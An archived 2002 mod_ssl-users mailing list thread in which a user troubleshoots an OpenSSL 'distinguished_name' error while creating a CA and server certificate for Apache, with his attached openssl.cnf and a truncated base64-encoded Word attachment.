	from me.homelinux.net id PAA06624; Thu, 28 Nov 2002 15:44:47 +0100 (MET)
Received: from Spooler by me.homelinux.net (Mercury/32 v3.32) ID MO00001A;
    28 Nov 02 15:44:41 +0100
Received: from spooler by me.homelinux.net (Mercury/32 v3.32); 28 Nov 02 15:44:32 +0100
Received: from stupar.homelinux.net (192.168.10.1) by 194.249.40.218 (Mercury/32 v3.32) with ESMTP ID MG000019;
   28 Nov 02 15:44:23 +0100
Message-ID: <3DE62BEC.2050005@stupar.homelinux.net>
Date: Thu, 28 Nov 2002 15:45:00 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
X-Accept-Language: en, sl, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Problems with creating own CA
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi !

I am trying to create my own CA. The creation of a key file is fine.
When I try to create a CSR file I get back an error "unable to find a
'distinguished_name' in config".
I am runing on winXP with openssl 0.9.6g. I wanted to make a server
certificate for my Apache.

Please help me !

Sasa

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 28 15:57:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA07035; Thu, 28 Nov 2002 15:56:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iris.dev.datalogica.com id PAA07028; Thu, 28 Nov 2002 15:56:06 +0100 (MET)
Received: from localhost (localhost [[UNIX: localhost]])
	by iris.dev.datalogica.com (8.11.6/8.11.6) id gASEu3o05277;
	Thu, 28 Nov 2002 14:56:03 GMT
Content-Type: text/plain;
  charset="iso-8859-1"
From: Maurizio Marini 
To: modssl-users@modssl.org, Sasa STUPAR 
Subject: Re: Problems with creating own CA
Date: Thu, 28 Nov 2002 15:56:02 +0100
User-Agent: KMail/1.4.1
References: <3DE62BEC.2050005@stupar.homelinux.net>
In-Reply-To: <3DE62BEC.2050005@stupar.homelinux.net>
MIME-Version: 1.0
Message-Id: <200211281556.02749.maumar@datalogica.com>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA07029
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maurizio Marini 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Thursday 28 November 2002 03:45 pm, Sasa STUPAR wrote:
"unable to find a 'distinguished_name' in config".

in your openssl.cnf  you should uncomment lines regarding distinguished_name;
otherwise re-post with it attached

- -- 
Maurizio Marini
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE95i6C4Q/49nIJTlwRArC3AJ9L+sCspWbSYGJr5QNIdoUxw+XTjACfVK6Q
o2atqXF6nX4goCsODTV7hmo=
=ldnj
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 28 17:02:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA09663; Thu, 28 Nov 2002 17:01:26 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from me.homelinux.net id RAA09648; Thu, 28 Nov 2002 17:01:04 +0100 (MET)
Received: from Spooler by me.homelinux.net (Mercury/32 v3.32) ID MO000020;
    28 Nov 02 17:00:58 +0100
Received: from spooler by me.homelinux.net (Mercury/32 v3.32); 28 Nov 02 17:00:51 +0100
Received: from stupar.homelinux.net (192.168.10.1) by 194.249.40.218 (Mercury/32 v3.32) with ESMTP ID MG00001F;
   28 Nov 02 17:00:39 +0100
Message-ID: <3DE63DCF.6080908@stupar.homelinux.net>
Date: Thu, 28 Nov 2002 17:01:19 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
X-Accept-Language: en, sl, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems with creating own CA
References: <3DE62BEC.2050005@stupar.homelinux.net> <200211281556.02749.maumar@datalogica.com>
Content-Type: multipart/mixed;
 boundary="------------080907080304080006060401"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------080907080304080006060401
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

They are already uncommented. Here is attached my config file.

Maurizio Marini a écrit:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> On Thursday 28 November 2002 03:45 pm, Sasa STUPAR wrote:
> "unable to find a 'distinguished_name' in config".
> 
> in your openssl.cnf  you should uncomment lines regarding distinguished_name;
> otherwise re-post with it attached
> 
> - -- 
> Maurizio Marini
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.6 (GNU/Linux)
> Comment: For info see http://www.gnupg.org
> 
> iD8DBQE95i6C4Q/49nIJTlwRArC3AJ9L+sCspWbSYGJr5QNIdoUxw+XTjACfVK6Q
> o2atqXF6nX4goCsODTV7hmo=
> =ldnj
> -----END PGP SIGNATURE-----
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


--------------080907080304080006060401
Content-Type: text/plain;
 name="openssl.cnf"
Content-Disposition: inline;
 filename="openssl.cnf"
Content-Transfer-Encoding: 7bit

#
# OpenSSL example configuration file.
# This is mostly being used for generation of certificate requests.
#

# This definition stops the following lines choking if HOME isn't
# defined.
HOME			= .
RANDFILE		= $ENV::HOME/.rnd

# Extra OBJECT IDENTIFIER info:
#oid_file		= $ENV::HOME/.oid
oid_section		= new_oids

# To use this configuration file with the "-extfile" option of the
# "openssl x509" utility, name here the section containing the
# X.509v3 extensions to use:
# extensions		= 
# (Alternatively, use a configuration file that has only
# X.509v3 extensions in its main [= default] section.)

[ new_oids ]

# We can add new OIDs in here for use by 'ca' and 'req'.
# Add a simple OID like this:
# testoid1=1.2.3.4
# Or use config file substitution like this:
# testoid2=${testoid1}.5.6

####################################################################
[ ca ]
default_ca	= CA_default		# The default ca section

####################################################################
[ CA_default ]

dir		= ./demoCA		# Where everything is kept
certs		= $dir/certs		# Where the issued certs are kept
crl_dir		= $dir/crl		# Where the issued crl are kept
database	= $dir/index.txt	# database index file.
new_certs_dir	= $dir/newcerts		# default place for new certs.

certificate	= $dir/cacert.pem 	# The CA certificate
serial		= $dir/serial 		# The current serial number
crl		= $dir/crl.pem 		# The current CRL
private_key	= $dir/private/cakey.pem# The private key
RANDFILE	= $dir/private/.rand	# private random number file

x509_extensions	= usr_cert		# The extentions to add to the cert

# Comment out the following two lines for the "traditional"
# (and highly broken) format.
name_opt 	= ca_default		# Subject Name options
cert_opt 	= ca_default		# Certificate field options

# Extension copying option: use with caution.
# copy_extensions = copy

# Extensions to add to a CRL. Note: Netscape communicator chokes on V2 CRLs
# so this is commented out by default to leave a V1 CRL.
# crl_extensions	= crl_ext

default_days	= 365			# how long to certify for
default_crl_days= 30			# how long before next CRL
default_md	= md5			# which md to use.
preserve	= no			# keep passed DN ordering

# A few difference way of specifying how similar the request should look
# For type CA, the listed attributes must be the same, and the optional
# and supplied fields are just that :-)
policy		= policy_match

# For the CA policy
[ policy_match ]
countryName		= match
stateOrProvinceName	= match
organizationName	= match
organizationalUnitName	= optional
commonName		= supplied
emailAddress		= optional

# For the 'anything' policy
# At this point in time, you must list all acceptable 'object'
# types.
[ policy_anything ]
countryName		= optional
stateOrProvinceName	= optional
localityName		= optional
organizationName	= optional
organizationalUnitName	= optional
commonName		= supplied
emailAddress		= optional

####################################################################
[ req ]
default_bits		= 1024
default_keyfile 	= privkey.pem
distinguished_name	= req_distinguished_name
attributes		= req_attributes
x509_extensions	= v3_ca	# The extentions to add to the self signed cert

# Passwords for private keys if not present they will be prompted for
# input_password = secret
# output_password = secret

# This sets a mask for permitted string types. There are several options. 
# default: PrintableString, T61String, BMPString.
# pkix	 : PrintableString, BMPString.
# utf8only: only UTF8Strings.
# nombstr : PrintableString, T61String (no BMPStrings or UTF8Strings).
# MASK:XXXX a literal mask value.
# WARNING: current versions of Netscape crash on BMPStrings or UTF8Strings
# so use this option with caution!
string_mask = nombstr

# req_extensions = v3_req # The extensions to add to a certificate request

[ req_distinguished_name ]
countryName			= SI
countryName_default		= SI
countryName_min			= 2
countryName_max			= 2

stateOrProvinceName		= Some province
stateOrProvinceName_default	= Some-State

localityName			= City

0.organizationName		= Organization
0.organizationName_default	= Internet Widgits Pty Ltd

# we can do this but it is not needed normally :-)
#1.organizationName		= Second Organization Name (eg, company)
#1.organizationName_default	= World Wide Web Pty Ltd

organizationalUnitName		= Organizational Unit Name (eg, section)
#organizationalUnitName_default	=

commonName			= Name
commonName_max			= 64

emailAddress			= Email
emailAddress_max		= 64

# SET-ex3			= SET extension number 3

[ req_attributes ]
challengePassword		= A challenge password
challengePassword_min		= 4
challengePassword_max		= 20

unstructuredName		= An optional company name

[ usr_cert ]

# These extensions are added when 'ca' signs a request.

# This goes against PKIX guidelines but some CAs do it and some software
# requires this to avoid interpreting an end user certificate as a CA.

basicConstraints=CA:FALSE

# Here are some examples of the usage of nsCertType. If it is omitted
# the certificate can be used for anything *except* object signing.

# This is OK for an SSL server.
# nsCertType			= server

# For an object signing certificate this would be used.
# nsCertType = objsign

# For normal client use this is typical
# nsCertType = client, email

# and for everything including object signing:
# nsCertType = client, email, objsign

# This is typical in keyUsage for a client certificate.
# keyUsage = nonRepudiation, digitalSignature, keyEncipherment

# This will be displayed in Netscape's comment listbox.
nsComment			= "OpenSSL Generated Certificate"

# PKIX recommendations harmless if included in all certificates.
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid,issuer:always

# This stuff is for subjectAltName and issuerAltname.
# Import the email address.
# subjectAltName=email:copy
# An alternative to produce certificates that aren't
# deprecated according to PKIX.
# subjectAltName=email:move

# Copy subject details
# issuerAltName=issuer:copy

#nsCaRevocationUrl		= http://www.domain.dom/ca-crl.pem
#nsBaseUrl
#nsRevocationUrl
#nsRenewalUrl
#nsCaPolicyUrl
#nsSslServerName

[ v3_req ]

# Extensions to add to a certificate request

basicConstraints = CA:FALSE
keyUsage = nonRepudiation, digitalSignature, keyEncipherment

[ v3_ca ]


# Extensions for a typical CA


# PKIX recommendation.

subjectKeyIdentifier=hash

authorityKeyIdentifier=keyid:always,issuer:always

# This is what PKIX recommends but some broken software chokes on critical
# extensions.
#basicConstraints = critical,CA:true
# So we do this instead.
basicConstraints = CA:true

# Key usage: this is typical for a CA certificate. However since it will
# prevent it being used as an test self-signed certificate it is best
# left out by default.
# keyUsage = cRLSign, keyCertSign

# Some might want this also
# nsCertType = sslCA, emailCA

# Include email address in subject alt name: another PKIX recommendation
# subjectAltName=email:copy
# Copy issuer details
# issuerAltName=issuer:copy

# DER hex encoding of an extension: beware experts only!
# obj=DER:02:03
# Where 'obj' is a standard or added object
# You can even override a supported extension:
# basicConstraints= critical, DER:30:03:01:01:FF

[ crl_ext ]

# CRL extensions.
# Only issuerAltName and authorityKeyIdentifier make any sense in a CRL.

# issuerAltName=issuer:copy
authorityKeyIdentifier=keyid:always,issuer:always

--------------080907080304080006060401--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 28 17:26:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA11536; Thu, 28 Nov 2002 17:25:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iris.dev.datalogica.com id RAA11450; Thu, 28 Nov 2002 17:24:17 +0100 (MET)
Received: from localhost (localhost [[UNIX: localhost]])
	by iris.dev.datalogica.com (8.11.6/8.11.6) id gASGOBr06045
	for modssl-users@modssl.org; Thu, 28 Nov 2002 16:24:11 GMT
Content-Type: text/plain;
  charset="iso-8859-1"
From: Maurizio Marini 
To: modssl-users@modssl.org
Subject: Re: Problems with creating own CA
Date: Thu, 28 Nov 2002 17:24:10 +0100
User-Agent: KMail/1.4.1
References: <3DE62BEC.2050005@stupar.homelinux.net> <200211281556.02749.maumar@datalogica.com> <3DE63DCF.6080908@stupar.homelinux.net>
In-Reply-To: <3DE63DCF.6080908@stupar.homelinux.net>
MIME-Version: 1.0
Message-Id: <200211281724.10858.maumar@datalogica.com>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA11524
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maurizio Marini 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Thursday 28 November 2002 05:01 pm, Sasa STUPAR wrote:
 >They are already uncommented. Here is attached my config file.
I've:
commonName                      = Common Name (eg, your name or your server\'s 
hostname)
commonName_max                  = 64
commonName_default              = iris.dev.datalogica.com

it seems u lack this:
commonName_default              = your_fqdn

- -- 
Maurizio Marini			GSM +39-335-8259739
Altamura: +39-080-3105228	Fax +39-080-3105228
Pesaro: 	+39-0721-54277 	Fax +39-0721-415055
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE95kMq4Q/49nIJTlwRAi2VAJwLwvjSjLUXjj/x9L0I3PWLF6lRLQCfaTxG
STINIYzTZ0FPIeYy3o5MKNg=
=t8N+
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 28 17:49:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA12303; Thu, 28 Nov 2002 17:48:15 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from me.homelinux.net id RAA12293; Thu, 28 Nov 2002 17:47:44 +0100 (MET)
Received: from Spooler by me.homelinux.net (Mercury/32 v3.32) ID MO000026;
    28 Nov 02 17:47:37 +0100
Received: from spooler by me.homelinux.net (Mercury/32 v3.32); 28 Nov 02 17:47:26 +0100
Received: from stupar.homelinux.net (192.168.10.1) by 194.249.40.218 (Mercury/32 v3.32) with ESMTP ID MG000025;
   28 Nov 02 17:47:20 +0100
Message-ID: <3DE648C2.40804@stupar.homelinux.net>
Date: Thu, 28 Nov 2002 17:48:02 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
X-Accept-Language: en, sl, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems with creating own CA
References: <3DE62BEC.2050005@stupar.homelinux.net> <200211281556.02749.maumar@datalogica.com> <3DE63DCF.6080908@stupar.homelinux.net> <200211281724.10858.maumar@datalogica.com>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Well, I have added what you've told me but still the same problem.



Maurizio Marini a écrit:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> On Thursday 28 November 2002 05:01 pm, Sasa STUPAR wrote:
>  >They are already uncommented. Here is attached my config file.
> I've:
> commonName                      = Common Name (eg, your name or your server\'s 
> hostname)
> commonName_max                  = 64
> commonName_default              = iris.dev.datalogica.com
> 
> it seems u lack this:
> commonName_default              = your_fqdn
> 
> - -- 
> Maurizio Marini			GSM +39-335-8259739
> Altamura: +39-080-3105228	Fax +39-080-3105228
> Pesaro: 	+39-0721-54277 	Fax +39-0721-415055
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.6 (GNU/Linux)
> Comment: For info see http://www.gnupg.org
> 
> iD8DBQE95kMq4Q/49nIJTlwRAi2VAJwLwvjSjLUXjj/x9L0I3PWLF6lRLQCfaTxG
> STINIYzTZ0FPIeYy3o5MKNg=
> =t8N+
> -----END PGP SIGNATURE-----
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 28 17:52:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA12381; Thu, 28 Nov 2002 17:51:14 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from me.homelinux.net id RAA12349; Thu, 28 Nov 2002 17:50:08 +0100 (MET)
Received: from Spooler by me.homelinux.net (Mercury/32 v3.32) ID MO000028;
    28 Nov 02 17:50:02 +0100
Received: from spooler by me.homelinux.net (Mercury/32 v3.32); 28 Nov 02 17:49:40 +0100
Received: from stupar.homelinux.net (192.168.10.1) by 194.249.40.218 (Mercury/32 v3.32) with ESMTP ID MG000027;
   28 Nov 02 17:49:37 +0100
Message-ID: <3DE6494B.5020205@stupar.homelinux.net>
Date: Thu, 28 Nov 2002 17:50:19 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
X-Accept-Language: en, sl, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems with creating own CA
References: <3DE62BEC.2050005@stupar.homelinux.net> <200211281556.02749.maumar@datalogica.com> <3DE63DCF.6080908@stupar.homelinux.net> <200211281724.10858.maumar@datalogica.com>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

One thing, if I try to use directly with the command "openssl req -new
-x509 -days 365 -key ca.key -out ca.crt" I get back error like before
with also that it canot load config info.
Any idea ?

Maurizio Marini a écrit:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> On Thursday 28 November 2002 05:01 pm, Sasa STUPAR wrote:
>  >They are already uncommented. Here is attached my config file.
> I've:
> commonName                      = Common Name (eg, your name or your server\'s 
> hostname)
> commonName_max                  = 64
> commonName_default              = iris.dev.datalogica.com
> 
> it seems u lack this:
> commonName_default              = your_fqdn
> 
> - -- 
> Maurizio Marini			GSM +39-335-8259739
> Altamura: +39-080-3105228	Fax +39-080-3105228
> Pesaro: 	+39-0721-54277 	Fax +39-0721-415055
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.6 (GNU/Linux)
> Comment: For info see http://www.gnupg.org
> 
> iD8DBQE95kMq4Q/49nIJTlwRAi2VAJwLwvjSjLUXjj/x9L0I3PWLF6lRLQCfaTxG
> STINIYzTZ0FPIeYy3o5MKNg=
> =t8N+
> -----END PGP SIGNATURE-----
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 28 18:06:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA13183; Thu, 28 Nov 2002 18:05:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA13114; Thu, 28 Nov 2002 18:04:59 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id CB0E64CE69A; Thu, 28 Nov 2002 18:04:58 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 94DA0285E0; Thu, 28 Nov 2002 18:03:38 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from me.homelinux.net id RAA12578; Thu, 28 Nov 2002 17:53:31 +0100 (MET)
Received: from Spooler by me.homelinux.net (Mercury/32 v3.32) ID MO00002B;
    28 Nov 02 17:53:24 +0100
Received: from spooler by me.homelinux.net (Mercury/32 v3.32); 28 Nov 02 17:53:13 +0100
Received: from stupar.homelinux.net (192.168.10.1) by 194.249.40.218 (Mercury/32 v3.32) with ESMTP ID MG00002A;
   28 Nov 02 17:52:52 +0100
Message-ID: <3DE64A0E.5070705@stupar.homelinux.net>
Date: Thu, 28 Nov 2002 17:53:34 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
X-Accept-Language: en, sl, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems with creating own CA
References: <3DE62BEC.2050005@stupar.homelinux.net> <200211281556.02749.maumar@datalogica.com> <3DE63DCF.6080908@stupar.homelinux.net> <200211281724.10858.maumar@datalogica.com>
Content-Type: multipart/mixed;
 boundary="------------010802080607010609080808"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------010802080607010609080808
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

I have here made a printscr and save it in a word doc. Please look at
it, maybe it will give same clue.


Maurizio Marini a écrit:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> On Thursday 28 November 2002 05:01 pm, Sasa STUPAR wrote:
>  >They are already uncommented. Here is attached my config file.
> I've:
> commonName                      = Common Name (eg, your name or your server\'s 
> hostname)
> commonName_max                  = 64
> commonName_default              = iris.dev.datalogica.com
> 
> it seems u lack this:
> commonName_default              = your_fqdn
> 
> - -- 
> Maurizio Marini			GSM +39-335-8259739
> Altamura: +39-080-3105228	Fax +39-080-3105228
> Pesaro: 	+39-0721-54277 	Fax +39-0721-415055
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.6 (GNU/Linux)
> Comment: For info see http://www.gnupg.org
> 
> iD8DBQE95kMq4Q/49nIJTlwRAi2VAJwLwvjSjLUXjj/x9L0I3PWLF6lRLQCfaTxG
> STINIYzTZ0FPIeYy3o5MKNg=
> =t8N+
> -----END PGP SIGNATURE-----
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


--------------010802080607010609080808
Content-Type: application/msword;
 name="ssl.doc"
Content-Disposition: inline;
 filename="ssl.doc"
Content-Transfer-Encoding: base64

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAACAAAAwwAAAAAA
AAAAEAAAxQAAAAEAAAD+////AAAAAMEAAADCAAAA////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
///////////////////////////////////spcEANUAkBAAA+BK/AAAAAAAAEAAAAAAABgAA
AggAAA4AYmpias8yzzIAAAAAAAAAAAAAAAAAAAAAAAAkBBYAIhAAAK1YAACtWAAAAgAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//w8AAAAAAAAAAAD//w8AAAAAAAAAAAD//w8A
AAAAAAAAAAAAAAAAAAAAAIgAAAAAAEIBAAAAAAAAQgEAAEIBAAAAAAAAQgEAAAAAAABCAQAA
AAAAAEIBAAAAAAAAQgEAABQAAAAAAAAAAAAAAFYBAAAAAAAAegEAAAAAAAB6AQAAAAAAAHoB
AAAAAAAAegEAAAwAAACGAQAADAAAAFYBAAAAAAAAhwIAALYAAACeAQAAAAAAAJ4BAAAAAAAA
ngEAAAAAAACeAQAAAAAAAJ4BAAAAAAAAngEAAAAAAACeAQAAAAAAAJ4BAAAAAAAABgIAAAIA
AAAIAgAAAAAAAAgCAAAAAAAACAIAAAAAAAAIAgAAAAAAAAgCAAAAAAAACAIAACQAAAA9AwAA
UgIAAI8FAABEAAAALAIAABUAAAAAAAAAAAAAAAAAAAAAAAAAQgEAAAAAAACeAQAAAAAAAAAA
AAAAAAAAAAAAAAAAAACeAQAAAAAAAJ4BAAAAAAAAngEAAAAAAACeAQAAAAAAACwCAAAAAAAA
AAAAAAAAAABCAQAAAAAAAEIBAAAAAAAAngEAAAAAAAAAAAAAAAAAAJ4BAAAAAAAAQQIAABYA
AADMAQAAAAAAAMwBAAAAAAAAzAEAAAAAAACeAQAAEAAAAEIBAAAAAAAAngEAAAAAAABCAQAA
AAAAAJ4BAAAAAAAABgIAAAAAAAAAAAAAAAAAAMwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAngEAAAAAAAAGAgAAAAAAAMwBAAAWAAAA
zAEAAAAAAAAAAAAAAAAAAOIBAAAAAAAAQgEAAAAAAABCAQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4gEAAAAAAACeAQAA
AAAAAJIBAAAMAAAAMFEwd/6WwgEAAAAAAAAAAHoBAAAAAAAArgEAAAoAAADiAQAAAAAAAAAA
AAAAAAAABgIAAAAAAABXAgAAMAAAAIcCAAAAAAAA4gEAAAAAAADTBQAAAAAAALgBAAAKAAAA
0wUAAAAAAADiAQAAAAAAAAAAAAAAAAAAVgEAAAAAAABWAQAAAAAAAEIBAAAAAAAAQgEAAAAA
AABCAQAAAAAAAEIBAAAAAAAAAAAAAAAAAAAAAAAAAAAAANMFAAAAAAAAAAAAAAAAAABCAQAA
AAAAAOIBAAAkAAAAngEAAAAAAACeAQAAAAAAAMwBAAAAAAAAngEAAAAAAACeAQAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAngEAAAAAAACeAQAAAAAAAJ4BAAAAAAAA
LAIAAAAAAAAsAgAAAAAAAFYBAAAAAAAAVgEAACQAAAB6AQAAAAAAAAAAAAAAAAAAwgEAAAoA
AABWAQAAAAAAAFYBAAAAAAAAegEAAAAAAAACAAEBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
